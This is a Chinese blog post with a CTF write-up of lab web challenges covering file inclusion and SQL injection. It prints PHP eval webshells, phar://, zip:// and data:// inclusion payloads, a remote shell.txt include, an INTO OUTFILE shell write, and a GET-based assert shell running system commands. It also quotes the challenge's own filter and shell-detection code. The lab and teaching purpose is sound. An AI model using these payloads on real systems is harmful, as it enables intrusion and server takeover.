<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 3px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Write Up," />





  <link rel="alternate" href="/atom.xml" title="spira1" type="application/atom+xml" />






<meta name="description" content="本地文件包含：第一关：首先查看源码，发现有提示：1234&amp;lt;--@cmd=$_GET[&apos;cmd&apos;];@include($cmd);--&amp;gt; 随便上传文件试试，先上传一个txt，发现没反应，再试试jpg文件，发现alert出路径了。 初步思路：上传一张带木马的图片，然后菜刀连接getshell。 建立一个txt文件，文件内容为：1234&amp;lt;?php@eval($_POST[&apos;67&apos;]);">
<meta name="keywords" content="Write Up">
<meta property="og:type" content="article">
<meta property="og:title" content="实验班小组出题WP">
<meta property="og:url" content="http://eagerseven.cn/2017/11/14/实验班小组出题WP/index.html">
<meta property="og:site_name" content="spira1">
<meta property="og:description" content="本地文件包含：第一关：首先查看源码，发现有提示：1234&amp;lt;--@cmd=$_GET[&apos;cmd&apos;];@include($cmd);--&amp;gt; 随便上传文件试试，先上传一个txt，发现没反应，再试试jpg文件，发现alert出路径了。 初步思路：上传一张带木马的图片，然后菜刀连接getshell。 建立一个txt文件，文件内容为：1234&amp;lt;?php@eval($_POST[&apos;67&apos;]);">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2018-10-31T11:54:03.590Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="实验班小组出题WP">
<meta name="twitter:description" content="本地文件包含：第一关：首先查看源码，发现有提示：1234&amp;lt;--@cmd=$_GET[&apos;cmd&apos;];@include($cmd);--&amp;gt; 随便上传文件试试，先上传一个txt，发现没反应，再试试jpg文件，发现alert出路径了。 初步思路：上传一张带木马的图片，然后菜刀连接getshell。 建立一个txt文件，文件内容为：1234&amp;lt;?php@eval($_POST[&apos;67&apos;]);">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://eagerseven.cn/2017/11/14/实验班小组出题WP/"/>





  <title>实验班小组出题WP | spira1</title>
  








</head>

<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>



   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 



<div id="hexo-helper-live2d">
  <canvas id="live2dcanvas" width="150" height="300"></canvas>
</div>
<style>
  #live2dcanvas{
    position: fixed;
    width: 150px;
    height: 300px;
    opacity:0.7;
    right: 0px;
    z-index: 999;
    pointer-events: none;
    bottom: -20px;
  }
</style>
<script type="text/javascript" src="/live2d/device.min.js"></script>
<script type="text/javascript">
const loadScript = function loadScript(c,b){var a=document.createElement("script");a.type="text/javascript";"undefined"!=typeof b&&(a.readyState?a.onreadystatechange=function(){if("loaded"==a.readyState||"complete"==a.readyState)a.onreadystatechange=null,b()}:a.onload=function(){b()});a.src=c;document.body.appendChild(a)};
(function(){
  if((typeof(device) != 'undefined') && (device.mobile())){
    var trElement = document.getElementById('hexo-helper-live2d');
    trElement.parentNode.removeChild(trElement);
    return;
  }else
    if (typeof(device) === 'undefined') console.error('Cannot find current-device script.');
  loadScript("/live2d/script.js", function(){loadlive2d("live2dcanvas", "/live2d/assets/hijiki.model.json", 0.5);});
})();
</script>


<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">spira1</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-music"></i> <br />
            
            Music
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://eagerseven.cn/2017/11/14/实验班小组出题WP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="spira1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="spira1">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">实验班小组出题WP</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-11-14T22:27:00+08:00">
                2017-11-14
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  5,540
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="本地文件包含："><a href="#本地文件包含：" class="headerlink" title="本地文件包含："></a>本地文件包含：</h3><h5 id="第一关："><a href="#第一关：" class="headerlink" title="第一关："></a>第一关：</h5><p>首先查看源码，发现有提示：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;--</span><br><span class="line">@cmd=$_GET[<span class="string">'cmd'</span>];</span><br><span class="line">@<span class="keyword">include</span>($cmd);</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure></p>
<p>随便上传文件试试，先上传一个txt，发现没反应，再试试jpg文件，发现alert出路径了。</p>
<p>初步思路：上传一张带木马的图片，然后菜刀连接getshell。</p>
<p>建立一个txt文件，文件内容为：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">@<span class="keyword">eval</span>($_POST[<span class="string">'67'</span>]);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'test'</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>改后缀为jpg上传。</p>
<p>接着访问：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2501/www/image/1.jpg</span><br></pre></td></tr></table></figure></p>
<p>404，想到是包含漏洞，所以修改路径：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2501/upload/index.php?cmd=www/image/1.jpg</span><br></pre></td></tr></table></figure></p>
<p>还是不对，估计路径还是不对，试试../相对路径：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2501/upload/index.php?cmd=../image/1.jpg</span><br></pre></td></tr></table></figure></p>
<p>菜刀连接getshell</p>
<h5 id="第二关："><a href="#第二关：" class="headerlink" title="第二关："></a>第二关：</h5><p>查看源码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;--</span><br><span class="line">@$cmd=$_GET[<span class="string">'cmd'</span>];</span><br><span class="line">@$cmd=str_replace(<span class="string">'../'</span>,<span class="string">''</span>,$cmd);</span><br><span class="line">@<span class="keyword">include</span>($cmd);</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure></p>
<p>过滤了../，并且还是过滤成空了，双写直接绕过getshell</p>
<h5 id="第三关："><a href="#第三关：" class="headerlink" title="第三关："></a>第三关：</h5><p>查看源码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;--</span><br><span class="line">@$cmd=$_GET[<span class="string">'cmd'</span>];</span><br><span class="line">@$cmd=str_replace(<span class="string">'../'</span>,<span class="string">''</span>,$cmd);</span><br><span class="line">@<span class="keyword">include</span>($cmd,<span class="string">'.php'</span>);</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure></p>
<p>看来被强制转化为php文件了，想到用00截断失败，估计版本较高（php 版本&lt;5.3.4 有效）。</p>
<p>在网上看到过一篇博客，用phar://协议和zip协议拿到shell：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://blog.ourren.com/2015/03/16/phar_include_exploit/</span><br></pre></td></tr></table></figure></p>
<p>直接贴步骤：liu.php（一句话木马）=》liu.zip=》liu.jpg=》上传，构造：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2503/upload/index.php?cmd=phar://..././image/liu.jpg/liu</span><br></pre></td></tr></table></figure></p>
<p>连接菜刀成功Get shell。</p>
<p>之前压缩成rar文件，一直连接不成功，后来改成zip成功了，还没搞清楚为何这样</p>
<p>顺便贴出zip://协议的构造：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2503/upload/index.php?cmd=zip://....//image/liu.jpg%23liu</span><br></pre></td></tr></table></figure></p>
<h5 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h5><p>学习了phar://和zip://姿势</p>
<h3 id="远程文件包含："><a href="#远程文件包含：" class="headerlink" title="远程文件包含："></a>远程文件包含：</h3><h5 id="第一关：-1"><a href="#第一关：-1" class="headerlink" title="第一关："></a>第一关：</h5><p>发现右上角有隐藏的提示cmd参数。<br>查看源码，发现有个链接：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://67.216.200.194/shell.txt</span><br></pre></td></tr></table></figure></p>
<p>访问是一个一句话木马，直接连接菜刀吧：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:777/challenge/?cmd=http://67.216.200.194/shell.txt</span><br></pre></td></tr></table></figure></p>
<p>flag在index.php源码。</p>
<h5 id="第二关：-1"><a href="#第二关：-1" class="headerlink" title="第二关："></a>第二关：</h5><p>这里可以试试data://伪协议:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:778/challenge/?cmd=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+</span><br></pre></td></tr></table></figure></p>
<p>发现phpinfo()函数被执行了，说明这个思路可以利用。<br>那么就直接写入一句话木马吧：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:778/challenge/?cmd=data://text/plain;base64,PD9waHAgQGV2YWwoJF9QT1NUWyc2NyddKTtlY2hvICJ0ZXN0Ijs/Pg==</span><br></pre></td></tr></table></figure></p>
<p>成功输出test，连接菜刀getshell。</p>
<h3 id="SQL字符型注入："><a href="#SQL字符型注入：" class="headerlink" title="SQL字符型注入："></a>SQL字符型注入：</h3><h5 id="第一关：-2"><a href="#第一关：-2" class="headerlink" title="第一关："></a>第一关：</h5><p>题目tips：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag由两部分组成，一个是拿到webshell后在网站根目录，另一个要在管理员页面以正确的管理员账号密码登录后弹窗，两个前后组成一起就是flag的base64编码</span><br></pre></td></tr></table></figure></p>
<p>一开始还以为是直接注入，flag和管理员账号密码都在数据库里，注入后发现只有几个用户名密码。</p>
<p>看来必须写入shell了，在注入点构造：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=1&amp;passwd=1&apos; union select 1,&apos;&lt;?php @eval($_POST[&quot;67&quot;]); echo &quot;test&quot;;?&gt;&apos; into outfile &apos;/var/www/html/7.php&apos;#&amp;submit=Submit</span><br></pre></td></tr></table></figure></p>
<p>写入路径要注意，不然会没有写入权限。我之前问某大佬一道sql注入题的时候，大佬直接查看源文件拿flag，他说常玩docker就知道这个路径了，是个小技巧。</p>
<p>OK写入成功后访问：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2001/var/www/html/7.php</span><br></pre></td></tr></table></figure></p>
<p>显示404，用../和../../也是一样。</p>
<p>于是用御剑扫，扫出了：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://222.18.158.233:2001/7.php</span><br></pre></td></tr></table></figure></p>
<p>访问输出了test，然后连接菜刀查看根目录拿到一半flag，但是没找到管理员账号密码，而且管理员登陆界面是404，那就直接在后台找flag吧。</p>
<h5 id="第二关：-2"><a href="#第二关：-2" class="headerlink" title="第二关："></a>第二关：</h5><p>题目tips：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">增加了过滤。。。。。emmm</span><br><span class="line">别想对bypass管理员的验证</span><br></pre></td></tr></table></figure></p>
<p>尝试发现过滤了空格，用%a0绕过。但是上传的一句话木马不能执行，推测是还过滤了某些关键字或者&lt;&gt;之类的吧。用hex编码绕过，上传连接菜刀getshell。</p>
<p>但是不像第一关，后台没有另外一半flag。倒是发现了两个好玩的东西。一个是py脚本，作用大概是定时重置数据库的。另一个是一个路由规则的txt文件。</p>
<p>txt文件：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">localhost:80-&gt;192.168.126.132:1002-&gt;222.18.158.233:2002</span><br><span class="line">localhost:3306-&gt;192.168.126.132:1010-&gt;222.18.158.233:2010</span><br></pre></td></tr></table></figure></p>
<p>3306端口转发，所以可以远程连接数据库（数据库账号密码在后台能看到）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -h 222.18.158.233 -P 2010 -u level2 -pKuriyama_Mirai</span><br></pre></td></tr></table></figure></p>
<p>连接到数据库后查看管理员账号密码，发现就是源码里的那个，但是密码是MD5加密。<br>修改试试，还是不能以管理员身份登陆。</p>
<p>后来问了下出题人才知道，修改密码后MD5加密后再update就可以了，可惜了，没想到这点</p>
<p>另外有一点，第二关的admin.php里有一段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include_once</span>(<span class="string">'http://172.17.0.2/level2/flag.php'</span>);</span><br></pre></td></tr></table></figure>
<p>说明开启了allow_url_include=On，有远程文件包含漏洞，可以用load_file直接读取源码</p>
<p>还有一点，正则里的.*可以用\n绕过</p>
<h5 id="第三关"><a href="#第三关" class="headerlink" title="第三关:"></a>第三关:</h5><p>放出了过滤文件的源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span><span class="params">($input)</span></span>&#123;</span><br><span class="line">    <span class="keyword">while</span>(preg_match(<span class="string">'/(and|or|union|where|limit|group by|select|hex|substr)/i'</span>,$input))&#123;</span><br><span class="line">        $input=preg_replace(<span class="string">'/(and|or|union|where|limit|group by|select|hex|substr)/i'</span>,<span class="string">''</span>,$input);</span><br><span class="line">    &#125;</span><br><span class="line">    $array=<span class="keyword">array</span>(<span class="string">"*"</span>,<span class="string">" "</span>,<span class="string">"-"</span>,<span class="string">"0x"</span>);</span><br><span class="line">    <span class="keyword">foreach</span>($array <span class="keyword">as</span> $str)&#123;</span><br><span class="line">        $input=str_replace($str,<span class="string">""</span>,$input);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $input;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter_add</span><span class="params">($input)</span></span>&#123;</span><br><span class="line">    $filter=preg_match(<span class="string">'/(select.*into)|(limit [0-9]+,[0-9]+)/i'</span>,$input);</span><br><span class="line">    <span class="keyword">if</span>($filter)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"&lt;script&gt;alert(\"emmmm...want to have a webshell?.\")&lt;/script&gt;"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter_admin</span><span class="params">($input)</span></span>&#123;</span><br><span class="line">    preg_match(<span class="string">"/^[_0-9a-z]&#123;4,25&#125;$/i"</span>,$input) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"&lt;script&gt;alert(\"Emmmmm...Your input is out of range or containing illegal parameter.\")&lt;/script&gt;"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>以为是出题人温（丧）暖（心）人（病）心（狂）的wp：</p>
<hr>
<p>在filter函数中，敏感字符串和特殊符号分开进行了过滤，先检查敏感字符串再替换特殊符号为空，仔细思考会发现其存在逻辑漏洞，可以在敏感字符串中插入特殊字符绕过敏感字符串检测，过滤特殊字符后变成正常语句，空格过滤可以用%0a、反引号或者\n绕过，然后就可以进行正常的注入爆数据等，爆出管理员账号密码，密码是多次base64加密的密文，python脚本跑一遍就能得到明文。登陆取得一半flag。</p>
<p>另一半需写入shell在上级目录读文件获得，在这里用正则过滤了“select into outfile”写shell的方式，但是正则写得不对……被大佬用\n和%0a绕过，这里本来是想让大家了解一下利用“terminated by”写shell的方式，在sqlmap目录下有个写shell的payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LIMIT 0,1 INTO OUTFILE &apos;%OUTFILE%&apos; LINES TERMINATED BY 0x%HEXSTRING%--</span><br></pre></td></tr></table></figure>
<p>与前者稍微不同的是，这个是在查询出数据后在数据中插入我们的一句话木马，因此写shell时前面需能正确查询一条或多条数据，具体可看这篇文章：<a href="http://www.cnblogs.com/qing123/p/6771858.html" target="_blank" rel="noopener">http://www.cnblogs.com/qing123/p/6771858.html</a></p>
<p>在后台有一个python脚本会扫生成的shell文件并检测其中的敏感字符串<br>代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">dir_list=[<span class="string">"admin.php"</span>,<span class="string">"index.php"</span>,<span class="string">"sql"</span>,<span class="string">"filter.php"</span>,<span class="string">"filter.php.bak"</span>]</span><br><span class="line">dir_list2=[<span class="string">"sql-con-1.php"</span>,<span class="string">"sql-con-2.php"</span>,<span class="string">"sql-con-3.php"</span>]</span><br><span class="line">str=<span class="string">"emmmm,your shell is detected"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    dir=os.listdir(<span class="string">"html/"</span>)</span><br><span class="line">    <span class="keyword">if</span> len(dir) != len(dir_list):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> dir:</span><br><span class="line">            <span class="keyword">if</span> i <span class="keyword">not</span> <span class="keyword">in</span> dir_list:</span><br><span class="line">                <span class="keyword">if</span> os.path.isfile(<span class="string">"html/%s"</span> % i):</span><br><span class="line">            dir_list.append(i)</span><br><span class="line">                    file=open(<span class="string">"html/%s"</span> % i,<span class="string">'r'</span>)</span><br><span class="line">                    <span class="keyword">try</span>:</span><br><span class="line">                        content=file.read()</span><br><span class="line">                        content=content.lower()</span><br><span class="line">                        result=re.search(<span class="string">"eval|assert|post|include|require|;"</span>,content)</span><br><span class="line">                        <span class="keyword">if</span> result != <span class="keyword">None</span>:</span><br><span class="line">                            print(<span class="string">'shell found'</span>)</span><br><span class="line">                            file.close()</span><br><span class="line">                            file=open(<span class="string">"html/%s"</span> % i,<span class="string">'w'</span>)</span><br><span class="line">                            file.write(str)</span><br><span class="line">                    <span class="keyword">finally</span>:</span><br><span class="line">                        file.close()</span><br><span class="line">            <span class="keyword">elif</span> os.path.isdir(<span class="string">"html/%s"</span> % i):</span><br><span class="line">                dir2=os.listdir(<span class="string">"html/%s/"</span> % i)</span><br><span class="line">                <span class="keyword">for</span> j <span class="keyword">in</span> dir2:</span><br><span class="line">                    <span class="keyword">if</span> j <span class="keyword">not</span> <span class="keyword">in</span> dir_list2:</span><br><span class="line">                        file = open(<span class="string">"html/%s/%s"</span> % (i,j), <span class="string">'r'</span>)</span><br><span class="line">                        <span class="keyword">try</span>:</span><br><span class="line">                            content = file.read()</span><br><span class="line">                content=content.lower()</span><br><span class="line">                            result = re.search(<span class="string">"eval|assert|include|post|require|;"</span>, content)</span><br><span class="line">                            <span class="keyword">if</span> result != <span class="keyword">None</span>:</span><br><span class="line">                print(<span class="string">'shell found'</span>)</span><br><span class="line">                                file.close()</span><br><span class="line">                                file = open(<span class="string">"html/%s/%s"</span> % (i,j), <span class="string">'w'</span>)</span><br><span class="line">                                file.write(str)</span><br><span class="line">                        <span class="keyword">finally</span>:</span><br><span class="line">                            file.close()</span><br><span class="line">    time.sleep(<span class="number">5</span>)</span><br></pre></td></tr></table></figure>
<p>过滤了eval、assert、post，等关键词，以及分号，同学可以写入免杀且隐蔽的一句话，然后因为检测脚本会sleep 5s，因此也可以通过脚本或者burp在被遍历修改前访问到，想要同学们熟悉的是只有$_GET的shell：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> $_GET[a]($_GET[b])<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>当a=assert时，后面可以执行一句话php代码，因此可以url传参a=assert&amp;b=system(‘cat ../flag.txt’)的方式读到flag，通过拿到第二题后wget或者第三题用load_file可以读到admin源码，可以发现我把密码加密函数文件放到了另外一台docker容器中，并通过远程包含的方式包含include进来：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include_once</span>(<span class="string">"http://172.17.0.3/level3/flag.php"</span>)</span><br></pre></td></tr></table></figure>
<p>可推测配置中allow_url_include=On，因此可以通过a=assert&amp;b=include(“<a href="http://xxxxx/shell.php" target="_blank" rel="noopener">http://xxxxx/shell.php</a>“)的方式拿到shell，这也是我在检测脚本中加入include和require检测的原因，避免直接包含了加密文件和shell</p>
<hr>
<h4 id="总结：-1"><a href="#总结：-1" class="headerlink" title="总结："></a>总结：</h4><p>这次的题目较难，学到的东西也更多</p>
<p>1.学习了纯GET型的shell:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> $_GET[a]($_GET[b])<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>2.在不支持union写入shell的情况下可以用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">terminated by</span><br></pre></td></tr></table></figure>
<p>写入，并且，写入shell的函数除了into outfile,还有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">into dumpfile</span><br></pre></td></tr></table></figure>
<p>3.学习了利用端口转发远程登陆数据库</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h4 id="第一关：-3"><a href="#第一关：-3" class="headerlink" title="第一关："></a>第一关：</h4><p>在注入之前先了解一下什么是UpdateXml注入：</p>
